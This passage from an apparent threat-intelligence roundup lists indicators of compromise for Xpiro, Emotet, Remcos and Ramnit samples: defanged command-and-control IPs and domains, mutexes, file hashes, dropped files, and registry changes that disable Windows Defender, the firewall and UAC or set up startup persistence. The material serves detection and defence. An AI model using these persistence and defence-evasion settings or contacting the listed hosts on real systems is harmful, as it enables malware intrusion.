%ProgramFiles%\7-Zip\Lang\sq.txt 16
%ProgramFiles%\7-Zip\Lang\sr-spc.txt 16
%ProgramFiles%\7-Zip\Lang\sr-spl.txt 16
*See JSON for more IOCs

File Hashes

00e862ecba1e2a71769a67fc5c27499e00c5594f6b7ed4e4114c2fe1fb43492f 144c480ed69ac652c4eb4efa5b6038d7a68ed3bca67089997b4228e1c814f7c4 1b02123c913912f44a6ef1c3c4a5a008270d9d8e802e92b4baa259135f25dc21 22f322c8241b4860c066f5ae57115c58f373753e3d8c9bede4521e5a5ed85e65 35aeb94c99b948b122f3e4bd4298107ab15cb8bbdb11b533d32666dbb1455ae3 3ba05e043bf3148202f498dcddb6bd67680f76640aef2d08f9ae1272ff85e719 41cba3025ecc75863b7a836ee00fdf2bbc2df90dffb17541b5bb1c9fcb269bd1 9223631593b46b54450b76028a69ddd837d06cd7e9b3d8e3f7bd584a46af22bf b2713458d2c3ebd4b558f8c2ce19a90bd97095ca868fd499755bf1c9cbd0c388 bdf2c5fcf72e7d7870e81ffacdd01206ed98d2446a85c28e7eaf73e26d7a6eda be9fac828e64c19e0a3fbf3c4a752d5332b7c0b849556f5388645515a29538ee c00039c0454935a5079dc801ce4420457eb9964cbed8372b5aff5c60a45fa26c d540b31f009a4138b5d35735fa9976522f4d5ee9e6b8dbdbde479796ebc6d4c0 dba60ef1804b4d90d74a2988fe53f044d7619f469d0ba9660e5646a1a67439cd f1ab2d7ace4656b5f3770186d088ac0644482fe43f38fe2bdb9217744d0f58c1 ff6f821dc0526f3615b1a3c37b2b14094f53d05cb0a6a753cb257cb0bcde6898

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Virus.Xpiro-9960895-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 23 samples
Registry Keys Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_32
Value Name: Type
23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_64
Value Name: Type
23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_32
Value Name: Type
23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_32
Value Name: Start
23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\COMSYSAPP
Value Name: Type
23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\COMSYSAPP
Value Name: Start
23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MOZILLAMAINTENANCE
Value Name: Type
23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MOZILLAMAINTENANCE
Value Name: Start
23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\OSE
Value Name: Type
23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\OSE
Value Name: Start
23
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC\S-1-5-21-2580483871-590521980-3826313501-500 23
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC\S-1-5-21-2580483871-590521980-3826313501-500
Value Name: EnableNotifications
23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_32
Value Name: Start
23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_64
Value Name: Start
23
<HKLM>\SOFTWARE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\STATE
Value Name: AccumulatedWaitIdleTime
23
<HKLM>\SOFTWARE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\LISTENEDSTATE
Value Name: RootstoreDirty
23
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\STATE
Value Name: AccumulatedWaitIdleTime
23
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\LISTENEDSTATE
Value Name: RootstoreDirty
23
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_64
Value Name: Type
22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_64
Value Name: Start
22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IEETWCOLLECTORSERVICE
Value Name: Type
22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IEETWCOLLECTORSERVICE
Value Name: Start
22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Start
21
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} 18
Mutexes Occurrences
kkq-vx_mtx63 23
kkq-vx_mtx64 23
kkq-vx_mtx65 23
kkq-vx_mtx66 23
kkq-vx_mtx67 23
kkq-vx_mtx68 23
kkq-vx_mtx69 23
kkq-vx_mtx70 23
kkq-vx_mtx71 23
kkq-vx_mtx72 23
kkq-vx_mtx73 23
kkq-vx_mtx74 23
kkq-vx_mtx75 23
kkq-vx_mtx76 23
kkq-vx_mtx77 23
kkq-vx_mtx78 23
kkq-vx_mtx79 23
kkq-vx_mtx80 23
kkq-vx_mtx81 23
kkq-vx_mtx82 23
kkq-vx_mtx83 23
kkq-vx_mtx84 23
kkq-vx_mtx85 23
kkq-vx_mtx86 23
kkq-vx_mtx87 23
*See JSON for more IOCs
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
107[.]22[.]125[.]105 7
3[.]217[.]206[.]46 4
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
ninite[.]com 21
www[.]bing[.]com 1
Files and or directories created Occurrences
%CommonProgramFiles%\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE 23
%CommonProgramFiles(x86)%\microsoft shared\Source Engine\OSE.EXE 23
%ProgramFiles(x86)%\Microsoft Office\Office14\GROOVE.EXE 23
%ProgramFiles(x86)%\Mozilla Maintenance Service\maintenanceservice.exe 23
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe 23
%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe 23
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe 23
%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe 23
%System32%\FXSSVC.exe 23
%System32%\alg.exe 23
%System32%\dllhost.exe 23
%SystemRoot%\ehome\ehsched.exe 23
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngen_service.log 23
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\ngen_service.log 23
%SystemRoot%\SysWOW64\dllhost.exe 23
%SystemRoot%\SysWOW64\svchost.exe 23
%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log 23
%SystemRoot%\SysWOW64\dllhost.vir 23
%SystemRoot%\SysWOW64\svchost.vir 23
%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\ngenservicelock.dat 23
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngen_service.lock 23
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngenservicelock.dat 23
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\ngen_service.lock 23
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\ngenservicelock.dat 23
%CommonProgramFiles(x86)%\microsoft shared\source engine\ose.vir 23
*See JSON for more IOCs

File Hashes

137ad3b55addd7191c8c974beef6b65bae791bc4de1e86b7e2965b311d40e2d0 1cfd0fd601a0f5234ce72672ec9c6c866dca03836198d93a320ed5df0bddd7f8 1e831b6d0cabaa8b44de36c1b96dd6e54e295502eb171be4f87723212fe574ca 1f935627d9866da115f1aad78be290f60a639bec1a94d6b8397326eeb46c111b 30ffb87628211e78074a3a891b8bd173db6f2d74dc97e735ff386361cf29aee1 3f948d4350c566416101441adb1c00121bd835db40cc08c73a556b764458673d 47934d4f40e9a5af0ee572a7e1e088d29d3bfd655d4aff26018a64118ad68a24 563c16cb752614726d350000fbf514a8b8d32a8074cd12c7545d6ff93f790ed9 591ae4985fd6993f580eae6f93f3e96f7c73c14dc3927e96223e8003f9ab3588 5cbd454095120231e23ca372fee8e9e76f34e3f5491f8ab10e8e5203e4c52570 6f0f5fda67646bc8def9c66497041528cd8ed7158a169c1b0787f59360c28ea8 7ec4a0246b5d33dfe811f4f34ab94a6b82d822196776afbe28a0f543ade8ad63 97d0aeeca4859c38984086ff1bef13c9bd11466131058fabda20dd1b21342f7a a2839faa3c7ecbff8afa71ca5787690e0e3eaeb36b899bab1926b19ce32b8c6d bcf2ae9a67fe974c02e95fbdd4edcce7df377a288c7586dae9d0b625aeedc93b c51d235b290424ad6baf08d67ab600a260200846a3f4b218e916933594b40537 d3d7dd910bd5e79fdb39d51aa83afaccdfd10538d30dd69bc7219a146e897361 d445c1ac4afae6cb028a2508c655271e3d69e07d9e016887d89d790c80fc0409 e23566aabaa7743da973840338829cc25d6936e8fcb5fb8d9b78b0ccac46c1ea e37b0661d4e4483048abcf0abba65060c78716672790e12bb0a768f04b18134b e48a371f7f5f3ad1cda0d16312f30846b6a12494967c8fba8de7f65a5673b1ff eb1ecc1ef099105b4882ccace3caf843ed1508b1463f8af6cc94adaa0181b721 ec1bc44db50911234444c575d91335113232ab5b1f6cad6acf5e52ff16ccd8fb

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.Emotet-9961142-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 218 samples
Registry Keys Occurrences
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
190
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
64
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
64
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
64
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
64
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
64
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
64
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 63
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
61
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
60
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%systemroot%\system32\dot3svc.dll,-1103
14
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @oleres.dll,-5013
10
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%systemroot%\system32\browser.dll,-101
9
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\AxInstSV.dll,-104
9
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%systemroot%\system32\dps.dll,-501
9
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\ehome\ehrecvr.exe,-102
8
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @appmgmts.dll,-3251
8
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\dhcpcore.dll,-101
8
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%systemroot%\system32\appinfo.dll,-101
8
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\System32\audiosrv.dll,-205
7
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%systemroot%\system32\appidsvc.dll,-101
7
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @comres.dll,-948
7
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\System32\dnsapi.dll,-102
7
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%systemroot%\system32\cscsvc.dll,-201
7
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\System32\bthserv.dll,-102
7
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
5[.]196[.]74[.]210 82
74[.]208[.]45[.]104 82
45[.]55[.]219[.]163 82
45[.]55[.]36[.]51 82
174[.]45[.]13[.]118 82
180[.]92[.]239[.]110 82
91[.]83[.]93[.]99 82
217[.]199[.]160[.]224 78
89[.]32[.]150[.]160 78
68[.]183[.]190[.]199 78
45[.]161[.]242[.]102 78
209[.]236[.]123[.]42 78
71[.]197[.]211[.]156 78
91[.]121[.]54[.]71 78
85[.]25[.]207[.]108 58
88[.]249[.]181[.]198 58
65[.]156[.]53[.]186 58
68[.]183[.]233[.]80 58
177[.]32[.]8[.]85 58
81[.]17[.]93[.]134 58
197[.]232[.]36[.]108 58
23[.]46[.]150[.]72 30
23[.]46[.]150[.]48 27
23[.]221[.]72[.]27 13
23[.]221[.]72[.]10 6
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
apps[.]identrust[.]com 82
Files and or directories created Occurrences
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 35
%SystemRoot%\SysWOW64\printui 2
%SystemRoot%\SysWOW64\NlsLexicons0414 2
%SystemRoot%\SysWOW64\utildll 2
%SystemRoot%\SysWOW64\NlsData000a 2
%SystemRoot%\SysWOW64\fthsvc 2
%SystemRoot%\SysWOW64\shlwapi 2
%SystemRoot%\SysWOW64\WcsPlugInService 2
%SystemRoot%\SysWOW64\NlsLexicons0002 2
%SystemRoot%\SysWOW64\d3d8thk 1
%SystemRoot%\SysWOW64\instnm 1
%SystemRoot%\SysWOW64\cttune 1
%SystemRoot%\SysWOW64\tsbyuv 1
%SystemRoot%\SysWOW64\KBDSW 1
%SystemRoot%\SysWOW64\fc 1
%SystemRoot%\SysWOW64\rshx32 1
%SystemRoot%\SysWOW64\KBDHE220 1
%SystemRoot%\SysWOW64\WMADMOE 1
%SystemRoot%\SysWOW64\NlsData0002 1
%SystemRoot%\SysWOW64\iprop 1
%SystemRoot%\SysWOW64\rastls 1
%SystemRoot%\SysWOW64\aecache 1
%SystemRoot%\SysWOW64\SMBHelperClass 1
%SystemRoot%\SysWOW64\KBDNO 1
%SystemRoot%\SysWOW64\mfc100 1
*See JSON for more IOCs

File Hashes

0154a4e3faa4dafca324954364d049324d6fcc6b8a1c90cbae92cd41f8927c4e 01ea88880d59cd617d53bfd1849ad0c2023c9febc43b48579d06802c9b324d77 0222be0813e32c7a2c87a31482e33830a91b73a750aff3499da5caa100646607 0242673f6b5b086a61873f4773b8b7f119d025325f2724cb362b1151adccfc8b 02f7999d6693f08f5983effb8bee06145be3f7dc22ff1e5b745e8d0633fe19d6 038008283ccba00047b767169fd02554182310d7b32c6def8a3fc1c6a045daf1 0403b01de17d2130faa4eecf11111acf15bc672dfeb9394054e5aa05166b8289 044242411968ca1c92b3a645d7f470cf0cda1a220920da688558fde7f4108eb9 055014bbf3a21173e4e2d9fb22124d7d249bc8f8c748151197d6e985bdf06f67 05cf33a7202716161360fc0e6fd45091f9a290954ba26a64037745652fa4b487 066202dc95bd51220d42f603a030ef71527b8dc56e62200f0d175f09f3f89c27 06ee8bc6b3c35b3d3ea924f73db6da1df9061e69b487bad9718328f1d186f0c7 0780d91df0f27af4b00d51e531a1cf12d50bbb048a211e0b287820bd9313eab5 07c262357505c7bef31ebfe2bb6c13a3d386e38d262ba2bdbfb2e52c1bd066fd 080fc908405201cbf074d6343acf66ee3c4d57f231c399b87097f75b8ca7960f 08e6bfa50d4fe544c03474d1a23776762a47a0ceed44dbe5bbb6e09fce30b055 091b50c4a374f1fc1d15e81044c2b50f03fa7c3e8359eb09bb95dc25deeebd4d 098861c8b4411225b4fde8737ccb518052ef40c896ee4e42dfeecf322e56f07f 09c4a4a31a51590b27a82bcff450c29391d3dfde480df012f43020e858efb639 0b533cf67e6fd8298b62d3aaea82f07ad11c600fa8917f3b683a72da9ca2fa7e 0c33a1f3687e65daa8825856f309cc40ef97d0892ef7742a77355124e296b815 0ccab31b5610aac24a242c812f474ff24b8e345aa78fd4b7d0a92b690938f908 0cd25d45a5e31de0fc1b75ba65c5b43d934b60b7d07638aaa1ce0d83afd984ec 0d3fee19509a873e96a1b2559d9193cf046f7f35f49d16b180438d9df7da027f 0ea6a45d2ad1115ce7141f15693139b8bd9e5ffebb5a1321ab8c48e62d65fab9
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.Remcos-9961392-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 14 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\POULUS 14
<HKCU>\SOFTWARE\POULUS\MICROMINIATURISER 14
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\BRUGERNAVNETS 14
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\BRUGERNAVNETS\TIVOLIET 14
<HKCU>\SOFTWARE\POULUS\MICROMINIATURISER
Value Name: Komplettes
14
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\BRUGERNAVNETS\TIVOLIET
Value Name: Fins
14
<HKCU>\SOFTWARE\[email protected] 7
<HKCU>\SOFTWARE\[email protected]
Value Name: licence
7
<HKCU>\SOFTWARE\[email protected]
Value Name: exepath
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: ornamenterne
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Hyldetrs
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: lnglidninger
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Vampirebat
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Dereferencing
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Sarkastisk
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Martyrologistic
1
Mutexes Occurrences
Remcos_Mutex_Inj 7
[email protected] 7
Global\916138a1-15e4-11ed-9660-00151792685a 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
5[.]2[.]75[.]164 7
181[.]235[.]13[.]200 4
186[.]169[.]54[.]97 3
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
colpatvalidacionnuevo[.]xyz 7
Files and or directories created Occurrences
%HOMEPATH%\Desktop\Markedness.ini 14
%TEMP%\ns<random, matching '[a-z][A-F0-9]{1,4}'>.tmp 14
%TEMP%\ns<random, matching '[a-z][A-F0-9]{4}'>.tmp\System.dll 14
%TEMP%\logsflat458 7
%TEMP%\logsflat458\sasgs527.dat 7
\TEMP\en-US\22d69844486d029467b528c89bf763a6.exe.mui 1
\TEMP\en-US\ef6731323cff411f303c2bd29b9f15c8.exe.mui 1
\TEMP\en-US\b2a7538d257a51b1a506b646c248fcbe.exe.mui 1
\TEMP\en-US\570979659276a2a985f97f7965f97f76.exe.mui 1
\TEMP\en-US\f231d436f8d62de3082ea791da78ed50.exe.mui 1
\TEMP\en\f231d436f8d62de3082ea791da78ed50.exe.mui 1
\TEMP\en\ef6731323cff411f303c2bd29b9f15c8.exe.mui 1
%TEMP%\Selenitic 1
%TEMP%\Dextroamphetamine 1
%TEMP%\Selenitic\Uncooping.exe 1
%TEMP%\Dextroamphetamine\Lobcokt.exe 1
\TEMP\en\22d69844486d029467b528c89bf763a6.exe.mui 1
%TEMP%\Tiki124 1
%TEMP%\Tiki124\Unexpecting.exe 1
\TEMP\en\b2a7538d257a51b1a506b646c248fcbe.exe.mui 1
\TEMP\en\570979659276a2a985f97f7965f97f76.exe.mui 1
%TEMP%\Sekundrkommunens 1
%TEMP%\Giganter27 1
%TEMP%\Sekundrkommunens\Unpracticability174.exe 1
%TEMP%\Giganter27\Spandauerne.exe 1
*See JSON for more IOCs

File Hashes

125b94822affbd4b1b67333905a91231c62e427334475ada0daa44d007e884c1 332cb82247db85cd4c772200938a7623c4161a15d680157cdc688b53aae2303a 3efb2166b220fd7d7e5df42739d998f6ed4c70fefdcb03b6a9b1810d6dcfcd77 42d77fbb29467078ade8ecba705a648d3d4aeacd5f6735a6d92d17cb55ff7049 6761e346725d0cfa3436b459176ff467f7b4a426af0559845032c912420747cd 72d9be63e832a89a04ffcfb48c30199d3461fe982bde962f57c7cf71e0f5f06a 8c420a6337376e20c987679a34e3d09194e504c444fbf50619328f5c0dda9217 942dcafe7a16cfdd1769048c73590ec2c29e9c76a9f6c46e6b6e88ac2220b0ef 9ead44844a24092afb456478686839852e04cd1ad8e081185ae432f1171baa1b a3ec71d27779875c7262d608c3c5e591fa7c12f0893e006bb6f7d2ad1d710142 a742e0a1f7939fdaf5eb615bac3da040781bd19e84e3f647186314ecb6e0fa5e ce2ff79b4178d9b7f142001bc227753dd395fcd1a28a385bfa379e0857181467 d52c22336b2e2efaeab6b8eb2be8726a36eaea553905b01102d9716d4c6184af e2deccb5d8cc1ec270d95501aaa7e53951bd7f89c2c0bcd50420bf94b7057675

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.Ramnit-9961396-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusOverride
26
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusDisableNotify
26
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: FirewallDisableNotify
26
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: FirewallOverride
26
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UpdatesDisableNotify
26
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UacDisableNotify
26
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
26
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: EnableFirewall
26
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DoNotAllowExceptions
26
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DisableNotifications
26
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
26
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Start
26
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: Start
26
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION
Value Name: jfghdug_ooetvtgk
26
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: JudCsgdy
26
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV
Value Name: Start
26
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Defender
26
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: Userinit
26
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: Userinit
26
Mutexes Occurrences
qazwsxedc 26
{7930D12C-1D38-EB63-89CF-4C8161B79ED4} 26
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
72[.]26[.]218[.]70 25
195[.]201[.]179[.]207 25
208[.]100[.]26[.]245 25
46[.]165[.]220[.]155 25
35[.]205[.]61[.]67 25
142[.]250[.]80[.]14 25
63[.]251[.]235[.]76 25
64[.]225[.]91[.]73 25
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
google[.]com 25
gjvoemsjvb[.]com 25
ahpygyxe[.]com 25
msoalrhvphqrnjv[.]com 25
rdslmvlipid[.]com 25
jpcqdmfvn[.]com 25
rrmlyaviljwuoph[.]com 25
maajnyhst[.]com 25
enbbojmjpss[.]com 25
oqmfrxak[.]com 25
tdccjwtetv[.]com 25
tpxobasr[.]com 25
xpdsuvpcvrcrnwbxqfx[.]com 25
fbrlgikmlriqlvel[.]com 25
boeyrhmrd[.]com 25
ugcukkcpplmouoah[.]com 25
gugendolik[.]com 25
Files and or directories created Occurrences
%LOCALAPPDATA%\bolpidti 26
%LOCALAPPDATA%\bolpidti\judcsgdy.exe 26
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\judcsgdy.exe 26

File Hashes

081742e8ed56a1a933e0507ccd536aaaf7242ac76d47a1a49626ee71c6756b53 0e372167303e500219b580a1a0367d2b69ab693e56934584e05cd963736bd463 10cef31349a4842546edbc5244d0d3aaed1e3c058008800c889abf5dc43ec343 127ee9c2897fb600dec742861451fdcf48820c200e15df7479542ed4232c0584 155b0301ce2f88c396fb7aa77cbc82c51a01660e6a74b63f7ba8dc8f023ea7e8 1e1773938b5bdd08be479ca9186a30d3fad83ea67ae905f391508ac543c2a38f 263351025d462b47660ea4bacd71ae1fd694de45a3d9bd5b14e58be1c4362d00 2e2ac92783031efdde48674b0ed3362c81fac9b25756ee39af1629f39309ccc2 340833674362d0c01995cc8657a95a628fddeb853272b6d89dfcf98bbe106cbe 39b9cfa59e688e1d56e6499b80637f321f777d022dff4a9eaf691ba9a1e9cc86 3cc065b26f54c993606649d1679bca81068c10e3727fdf9ee811fa6a17c1ebad 41b21c4398fa089007a9a34aac8a3f5d14b61814ff036b555cc6b09c8efd81aa 4b183d215f86d026ef2bac0cf5dd4b28146612d52206e358169b0f1d3209c76d 4ed2cf991c4ed810cdbb5d567d33e1f1d94218ae43c506d6b33d2acc35009598 57fa2ea50d27a8cc8feec2867a680ae6e9a0d1a47d117733a73db86da3bf8416 5de59e2cc183ce5f34b2ca66fbd1edce54b3a6208ae7621c49cbd78835bdcbf5 699e006e4a6871ca898aacf55f84c36ea43d8b9e421b71dd20a0fe5a06378d66 6a216904abbf52246819029936c7e8705f50c61ba0ee6a62d8a14881cfca0a33 77aeccd3d538a6effc3623344a331d5190c747489a5cc511d4e7d973e879ff8a 77c966ca4088e8b918b4e40ed539a510fad2a2631ff17d1a1b01a1670e6fa400 79622d5b5ef3c93d32bcaaba64cfbbe4a88ec7f56d1f7f2160b9219321058f29 8c878b6608dba85c650ffda157cc14d885f14559e8c6b38a5ae0be85d5a73001 8d5f17bf76258cf83d0678cef645b0fa2f0b6df56858fb0ec4cab8894b59b316 a1574bfff6cebf0757ab5a7fc7634b7956fed8943e088b87820ff13be65789c4 af0aa7289a5770da3a158d0f0fbea1c5073b6ca4f6fe5a7bebdde44a55ca2c2e
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK